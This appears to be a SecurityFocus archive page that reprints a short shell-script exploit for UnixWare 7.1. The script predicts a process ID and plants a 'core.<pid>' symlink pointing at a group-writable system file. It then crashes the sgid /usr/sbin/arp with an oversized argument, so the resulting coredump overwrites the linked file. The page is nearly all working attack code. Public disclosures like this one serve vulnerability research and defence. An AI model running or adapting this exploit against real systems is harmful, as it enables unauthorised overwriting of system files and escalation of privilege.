SCO UnixWare 'coredump' Symlink Vulnerability

#!/bin/sh
####
# Exploit for UnixWare 7.1 - sgid coredumps follow symlinks.
# Guessing pid is trivial. Any sgid program which will coredump can be used
# -Brock Tellier, btellier@usa.net
####
pid=`expr $$ + 4`;
ln -s /path/to/sys/group/writable/file core.$pid
/usr/sbin/arp `perl -e "print 'A' x 10000"`


 

Privacy Statement
Copyright 2010, SecurityFocus